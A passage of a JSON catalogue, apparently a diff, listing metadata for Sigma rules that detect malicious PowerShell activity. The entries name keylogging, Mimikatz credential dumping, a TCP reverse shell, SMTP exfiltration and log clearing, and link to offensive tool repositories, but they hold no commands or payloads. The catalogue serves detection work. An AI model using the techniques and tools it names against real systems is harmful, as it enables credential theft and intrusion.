"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", - "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", - "value": "Invoke-Obfuscation Via Use Rundll32 - PowerShell" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" - }, - { - "description": "Adversaries may log user 
keystrokes to intercept credentials as the user types them.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_keylogging.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" - ], - "tags": [ - "attack.collection", - "attack.t1056.001" - ] - }, - "uuid": "34f90d3c-c297-49e9-b26d-911b05a4866c", - "value": "Powershell Keylogging" - }, - { - "description": "Adversaries may manipulate accounts to maintain access to victim systems.\nAccount manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_localuser.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_localuser.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "4fdc44df-bfe9-4fcc-b041-68f5a2d3031c", - "value": "Powershell LocalAccount Manipulation" - }, - { - "description": "Detects usage of the powerShell 
New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_mailboxexport_share.yml", - "level": "critical", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" - ], - "tags": [ - "attack.exfiltration" - ] - }, - "uuid": "4a241dea-235b-4a7e-8d76-50d817b146c4", - "value": "Suspicious PowerShell Mailbox Export to Share - PS" - }, - { - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - 
"https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "value": "Malicious PowerShell Commandlets" - }, - { - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_malicious_keywords.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_keywords.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "value": "Malicious PowerShell Keywords" - }, - { - "description": "Detects usage of a PowerShell command to dump the live memory of a Windows machine", - "meta": { - "author": "Max Altgelt", - "creation_date": "2021/09/21", - "falsepositive": [ - "Diagnostics" - ], - "filename": "posh_ps_memorydump_getstoragediagnosticinfo.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml" - ], - "tags": [ - "attack.t1003" - ] - }, - "uuid": "cd185561-4760-45d6-a63e-a51325112cae", - "value": "Live Memory Dump Using Powershell" - }, - { - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", - "meta": { - "author": "frack113", - "creation_date": "2022/08/19", - "falsepositive": [ - "Legitimate use" - ], - "filename": "posh_ps_modify_group_policy_settings.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1484.001" - ] - }, - "uuid": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "value": "Modify Group Policy Settings - ScriptBlockLogging" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. 
(Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", - "meta": { - "author": "frack113, MatilJ", - "creation_date": "2022/01/19", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_msxml_com.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt", - "https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85)", - "https://www.trendmicro.com/en_id/research/22/e/uncovering-a-kingminer-botnet-attack-using-trend-micro-managed-x.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_msxml_com.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "78aa1347-1517-4454-9982-b338d6df8343", - "value": "Powershell MsXml COM Object" - }, - { - "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", - "meta": { - "author": "Alec Costello", - "creation_date": "2019/05/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_nishang_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", - "value": "Malicious Nishang PowerShell Commandlets" - }, - { - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "meta": { - "author": "Sami Ruohonen", - "creation_date": "2018/07/24", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_ntfs_ads_access.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "http://www.powertheshell.com/ntfsstreams/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_ntfs_ads_access.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8c521530-5169-495d-a199-0a3a881ad24e", - "value": "NTFS Alternate Data Stream" - }, - { - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_office_comobject_registerxll.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.006" - ] - }, - "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "value": "Code Executed Via Office Add-in XLL File" - }, - { - "description": "Detects Invoke-Mimikatz PowerShell script and alike. 
Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords.", - "meta": { - "author": "Tim Rauch", - "creation_date": "2022/09/28", - "falsepositive": [ - "Mimikatz can be useful for testing the security of networks" - ], - "filename": "posh_ps_potential_invoke_mimikatz.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ] - }, - "uuid": "189e3b02-82b2-4b90-9662-411eb64486d4", - "value": "Potential Invoke-Mimikatz PowerShell Script" - }, - { - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "meta": { - "author": "Bhabesh Raj", - "creation_date": "2021/05/18", - "falsepositive": [ - "Should not be any as administrators do not use this tool" - ], - "filename": "posh_ps_powerview_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "value": "Malicious PowerView PowerShell Commandlets" - }, - { - "description": "Detects PowerShell calling a credential prompt", - "meta": { - "author": "John Lambert (idea), Florian Roth (rule)", - 
"creation_date": "2017/04/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_prompt_credentials.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/JohnLaTwC/status/850381440629981184", - "https://t.co/ezOTGy1a1G", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_prompt_credentials.yml" - ], - "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "value": "PowerShell Credential Prompt" - }, - { - "description": "Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/10/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "posh_ps_psasyncshell.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/JoelGMSec/PSAsyncShell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psasyncshell.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "afd3df04-948d-46f6-ae44-25966c44b97f", - "value": "PSAsyncShell - Asynchronous TCP Reverse Shell" - }, - { - "description": "Detects the use of PSAttack PowerShell hack tool", - "meta": { - "author": "Sean Metcalf (source), Florian Roth (rule)", - "creation_date": "2017/03/05", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_psattack.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=2921", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_psattack.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", - "value": "PowerShell 
PSAttack" - }, - { - "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/06", - "falsepositive": [ - "Legitimate administrative script" - ], - "filename": "posh_ps_remote_session_creation.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "a0edd39f-a0c6-4c17-8141-261f958e8d8f", - "value": "PowerShell Remote Session Creation" - }, - { - "description": "Powershell Remove-Item with -Path to delete a file or a folder with \"-Recurse\"", - "meta": { - "author": "frack113", - "creation_date": "2022/01/15", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_remove_item_path.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.004" - ] - }, - "uuid": 
"b8af5f36-1361-4ebe-9e76-e36128d947bf", - "value": "Use Remove-Item to Delete File" - }, - { - "description": "utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer.\nThis behavior is typically used during a kerberos or silver ticket attack.\nA successful execution will output the SPNs for the endpoint in question.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/28", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_request_kerberos_ticket.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "a861d835-af37-4930-bcd6-5b178bfb54df", - "value": "Request A Single Ticket via PowerShell" - }, - { - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "meta": { - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", - "creation_date": "2020/10/10", - "falsepositive": [ - "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" - ], - "filename": "posh_ps_root_certificate_installed.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.004" - ] - }, - "uuid": "42821614-9264-4761-acfc-5772c3286f76", - "value": "Root Certificate Installed - PowerShell" - }, - { - "description": "Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.", - "meta": { - "author": "frack113", - "creation_date": "2022/02/01", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_run_from_mount_diskimage.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso", - "https://docs.microsoft.com/en-us/powershell/module/storage/mount-diskimage?view=windowsserver2022-ps", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_run_from_mount_diskimage.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1553.005" - ] - }, - "uuid": "902cedee-0398-4e3a-8183-6f3a89773a96", - "value": "Suspicious Invoke-Item From Mount-DiskImage" - }, - { - "description": "Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nThis may include things such as firewall rules and anti-viru\n", - "meta": { - 
"author": "frack113", - "creation_date": "2021/12/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_security_software_discovery.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_security_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518.001" - ] - }, - "uuid": "904e8e61-8edf-4350-b59c-b905fc8e810c", - "value": "Security Software Discovery by Powershell" - }, - { - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", - "meta": { - "author": "frack113", - "creation_date": "2022/09/26", - "falsepositive": [ - "Legitimate script" - ], - "filename": "posh_ps_send_mailmessage.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", - "https://www.ietf.org/rfc/rfc2821.txt", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ] - }, - "uuid": "9a7afa56-4762-43eb-807d-c3dc9ffe211b", - "value": "Powershell Exfiltration Over SMTP" - }, - { - "description": "Detect adversaries enumerate sensitive files", - "meta": { - "author": "frack113", - 
"creation_date": "2022/09/16", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_sensitive_file_discovery.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/malmoeb/status/1570814999370801158", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_sensitive_file_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": "7d416556-6502-45b2-9bad-9d2f05f38997", - "value": "Powershell Sensitive File Discovery" - }, - { - "description": "Detects use of Set-ExecutionPolicy to set insecure policies", - "meta": { - "author": "frack113", - "creation_date": "2021/10/20", - "falsepositive": [ - "Administrator script" - ], - "filename": "posh_ps_set_policies_to_unsecure_level.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", - "https://adsecurity.org/?p=2604", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "61d0475c-173f-4844-86f7-f3eebae1c66b", - "value": "Change PowerShell Policies to an Insecure Level - PowerShell" - }, - { - "description": "Detects Base64 encoded Shellcode", - "meta": { - "author": "David Ledbetter (shellcode), Florian Roth (rule)", - "creation_date": "2018/11/17", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_shellcode_b64.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/cyb3rops/status/1063072865992523776", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellcode_b64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", - "value": "PowerShell ShellCode" - }, - { - "description": "Detects Commandlet names from ShellIntel exploitation scripts.", - "meta": { - "author": "Max Altgelt, Tobias Michalski", - "creation_date": "2021/08/09", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_shellintel_malicious_commandlets.yml", - "level": "high", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/Shellntel/scripts/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_shellintel_malicious_commandlets.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", - "value": "Malicious ShellIntel PowerShell Commandlets" - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "posh_ps_software_discovery.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_software_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1518" - ] - }, - 
"uuid": "2650dd1a-eb2a-412d-ac36-83f06c4f2282", - "value": "Detected Windows Software Discovery - PowerShell" - }, - { - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", - "meta": { - "author": "frack113", - "creation_date": "2021/09/02", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_store_file_in_alternate_data_stream.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.004" - ] - }, - "uuid": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", - "value": "Powershell Store File In Alternate Data Stream" - }, - { - "description": "Adversaries may attempt to find domain-level groups and permission settings.\nThe knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as domain administrators.\n", - "meta": { - "author": "frack113", - "creation_date": "2021/12/15", - "falsepositive": [ - "Unknown" - ], - "filename": "posh_ps_susp_ad_group_reco.yml", - "level": "low", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ad_group_reco.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1069.001" - ] - }, - "uuid": "88f0884b-331d-403d-a3a1-b668cf035603", - "value": "AD Groups Or Users Enumeration Using 
PowerShell - ScriptBlock" - }, - { - "description": "Detects usage of known powershell cmdlets such as \"Clear-EventLog\" to clear the windows event logs", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/12", - "falsepositive": [ - "Rare need to clear logs before doing something. Sometimes used by installers or cleaner scripts. The script should be investigated to determine if it's legitimate" - ], - "filename": "posh_ps_susp_clear_eventlog.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/oroneequalsone/status/1568432028361830402", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_clear_eventlog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001" - ] - }, - "uuid": "0f017df3-8f5a-414f-ad6b-24aff1128278", - "value": "Suspicious Eventlog Clear" - }, - { - "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", - "meta": { - "author": "frack113", - "creation_date": "2022/03/17", - "falsepositive": [ - "Legitimate PowerShell scripts" - ], - "filename": "posh_ps_susp_directory_enum.yml", - "level": "medium", - "logsource.category": "ps_script", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", - "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083" - ] - }, - "uuid": 
